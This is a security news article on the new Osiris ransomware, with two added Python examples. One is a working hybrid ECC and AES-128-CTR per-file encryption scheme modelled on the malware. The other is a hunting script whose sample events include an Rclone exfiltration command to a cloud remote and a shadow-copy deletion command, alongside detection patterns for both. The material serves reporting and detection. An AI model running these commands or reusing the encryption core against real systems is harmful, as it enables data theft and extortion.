A new ransomware family called Osiris has been linked to an attack on a major conglomerate in Southeast Asia late last year, and the tradecraft seen in that intrusion suggests that experienced threat actors are behind the newly emergent strain.
According to new research published today by Symantec and the Carbon Black Threat Hunter Team, Osiris is a distinct ransomware family with no known connection to existing ransomware strains. The malware was first detected being used in a targeted intrusion in November and exhibits technical and operational traits that suggest it is being wielded by seasoned attackers rather than inexperienced operators.
The developers of Osiris are unknown, but Carbon Black’s researchers have found indicators that the ransomware may be linked to campaigns previously undertaken by the Inc ransomware group.
The attackers used a wide range of so-called living-off-the-land and dual-use tools, along with a malicious driver known as Poortry that the researchers suggest is likely part of a "bring-your-own-vulnerable-driver" attack used to disable security software. The exfiltration of stolen data to Wasabi cloud storage, and the use of a Mimikatz variant with the same file name previously observed in Inc ransomware attacks, also point to possible operational overlap with Inc.
Under the hood, Osiris includes many of the features expected of modern ransomware. The ransomware can terminate processes and services, selectively encrypt files and folders, and append a ".Osiris" extension to affected files while deleting volume shadow copies. The malware uses a hybrid encryption scheme: each file is encrypted with its own AES-128-CTR key, and those per-file keys are in turn protected with elliptic curve cryptography. It also uses asynchronous I/O to speed up encryption.
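To make the hybrid scheme concrete, the following is an added illustration of how per-file AES-128-CTR keys wrapped under elliptic curve cryptography work in general. It is not Osiris' code and nothing in it is taken from the malware; the curve (P-256), the HKDF-based key wrap, the footer layout and the function names are all assumptions chosen for the example. It needs the `cryptography` package and operates only on in-memory bytes.

```python
"""Hybrid ECC + AES-128-CTR per-file encryption, illustrated.

Added example, NOT Osiris' own code. Curve, key-wrap construction and
footer layout are assumptions. Requires the `cryptography` package.
"""
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

EXTENSION = ".Osiris"                    # extension appended to encrypted files
CURVE = ec.SECP256R1()                   # assumption: the article names no curve
POINT_LEN = 65                           # uncompressed P-256 point
FOOTER_LEN = POINT_LEN + 16 + 16 + 16    # eph pub | wrap nonce | wrapped key | file nonce


def attacker_keypair():
    """The operator keeps the private key; only the public key ships in the payload."""
    priv = ec.generate_private_key(CURVE)
    return priv, priv.public_key()


def _aes_ctr(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """AES-CTR is symmetric: the same call encrypts and decrypts."""
    ctx = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    return ctx.update(data) + ctx.finalize()


def _kek_from_ecdh(own_priv, peer_pub) -> bytes:
    """Derive a 128-bit key-encryption key from an ECDH shared secret."""
    shared = own_priv.exchange(ec.ECDH(), peer_pub)
    return HKDF(algorithm=hashes.SHA256(), length=16, salt=None,
                info=b"per-file-key-wrap").derive(shared)


def encrypt_file(plaintext: bytes, attacker_pub) -> bytes:
    """Fresh AES-128 key per file, wrapped under an ephemeral ECDH secret."""
    file_key, file_nonce = os.urandom(16), os.urandom(16)
    body = _aes_ctr(file_key, file_nonce, plaintext)

    eph = ec.generate_private_key(CURVE)         # ephemeral key, discarded after use
    kek = _kek_from_ecdh(eph, attacker_pub)
    wrap_nonce = os.urandom(16)
    wrapped = _aes_ctr(kek, wrap_nonce, file_key)
    eph_pub = eph.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.UncompressedPoint)
    # The footer carries everything the decryptor needs except the attacker's private key.
    return body + eph_pub + wrap_nonce + wrapped + file_nonce


def decrypt_file(blob: bytes, attacker_priv) -> bytes:
    """Only the holder of the attacker's private key can redo the ECDH and unwrap the key."""
    body, footer = blob[:-FOOTER_LEN], blob[-FOOTER_LEN:]
    eph_pub_bytes = footer[:POINT_LEN]
    wrap_nonce = footer[POINT_LEN:POINT_LEN + 16]
    wrapped = footer[POINT_LEN + 16:POINT_LEN + 32]
    file_nonce = footer[POINT_LEN + 32:]
    eph_pub = ec.EllipticCurvePublicKey.from_encoded_point(CURVE, eph_pub_bytes)
    kek = _kek_from_ecdh(attacker_priv, eph_pub)
    file_key = _aes_ctr(kek, wrap_nonce, wrapped)
    return _aes_ctr(file_key, file_nonce, body)


def encrypted_name(path: str) -> str:
    """Name the file would carry after encryption."""
    return path + EXTENSION
```

The point for responders is in `encrypt_file`: the symmetric key and the ephemeral ECDH private key exist only while a single file is being processed, so a memory capture taken afterwards does not contain a reusable key, and the only recovery path is the operator's private key. The unauthenticated CTR key wrap here is enough to show the structure but is not something to copy into a real design.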
As is typical with many forms of ransomware, after encryption, Osiris victims receive a ransom note directing them to a negotiation portal and listing allegedly stolen data.
Though some parts of Osiris are typical of existing ransomware, there are some key differences in methodology. In Osiris attacks, data is stolen with Rclone several days before the ransomware is deployed, and the attackers use tools such as Netscan, Netexec and MeshAgent, alongside a modified version of the Rustdesk remote access tool disguised as "WinZip Remote Desktop" to evade detection.
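The tooling described in the two passages above (dual-use utilities, Rclone exfiltration to a cloud remote, a renamed Rustdesk, shadow copy deletion) is exactly what a hunt over process-creation telemetry can surface days before encryption starts. The following is an added example, not anything from the Symantec or Carbon Black research: the events are constructed, the field names are modelled on Sysmon Event ID 1 (`Image`, `OriginalFileName`, `Description`, `CommandLine`), and the tool file names, the `wzrd.exe` binary name and the `wasabi:` remote name are assumptions made for the sample.

```python
"""Hunting rules over constructed process-creation events.

Added example, not the researchers' detection logic. Field names follow
Sysmon Event ID 1; the sample events and tool file names are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real events). Index 0 is benign on purpose.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "Description": "Host Process for Windows Services",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\ProgramData\rclone.exe", "OriginalFileName": "rclone.exe",
     "Description": "Rclone",
     "CommandLine": r"rclone.exe copy D:\Finance wasabi:bucket-7/finance --transfers 32"},
    {"Image": r"C:\Program Files\WinZip Remote Desktop\wzrd.exe",
     "OriginalFileName": "rustdesk.exe", "Description": "WinZip Remote Desktop",
     "CommandLine": "wzrd.exe --service"},
    {"Image": r"C:\Temp\nxc.exe", "OriginalFileName": "nxc.exe",
     "Description": "NetExec", "CommandLine": "nxc.exe smb 10.0.0.0/24 --shares"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "Description": "Command Line Interface for Microsoft Volume Shadow Copy Service",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
]

# Dual-use tools named in the article; file names are assumptions.
DUAL_USE = {"netscan.exe", "nxc.exe", "netexec.exe", "meshagent.exe",
            "mimikatz.exe", "rclone.exe"}
# Remote-access tools whose PE OriginalFileName should match the on-disk name.
REMOTE_ACCESS = {"rustdesk.exe", "meshagent.exe"}
# rclone copy/sync/move to any configured remote ("name:"); drive letters are excluded.
RCLONE_TRANSFER = re.compile(
    r'rclone(\.exe)?"?\s+(copy|sync|move)\b.*?\s([A-Za-z0-9_-]{2,}):', re.I)
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the list of hunt findings for one process-creation event."""
    image = _basename(event["Image"])
    orig = event.get("OriginalFileName", "").lower()
    desc = event.get("Description", "")
    cmd = event.get("CommandLine", "")
    findings = []
    # Renamed remote-access tool: the PE's OriginalFileName survives a rename.
    if orig in REMOTE_ACCESS and image != orig:
        findings.append(f"masquerade: '{desc}' ({image}) is really {orig}")
    if image in DUAL_USE or orig in DUAL_USE:
        findings.append(f"dual-use tool: {orig or image}")
    m = RCLONE_TRANSFER.search(cmd)
    if m:
        findings.append(f"exfiltration: rclone {m.group(2).lower()} to remote '{m.group(3)}'")
    if SHADOW_DELETE.search(cmd):
        findings.append("shadow copy deletion")
    return findings


def hunt(events: list) -> dict:
    """Map event index -> findings for every event that triggers at least one rule."""
    return {i: f for i, e in enumerate(events) if (f := evaluate(e))}


if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], found)
```

The masquerade rule is the one worth keeping even if the others are noisy: a renamed binary still carries its original `OriginalFileName` in the PE version resource, so "WinZip Remote Desktop" backed by `rustdesk.exe` stands out regardless of the display name chosen. Rclone to a cloud remote and shadow copy deletion are the two events that, per the article, bracket the days between data theft and encryption.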
How worried security teams should be about the emergence of Osiris, however, remains an open question.
“The impact this new Osiris ransomware will have on the ransomware landscape in general remains to be seen,” the researchers note. “However, it is an effective encryption payload that appears to be wielded by experienced attackers. With the constant shifting sands of the ransomware landscape, the emergence of a new ransomware family is always something to keep an eye on.”
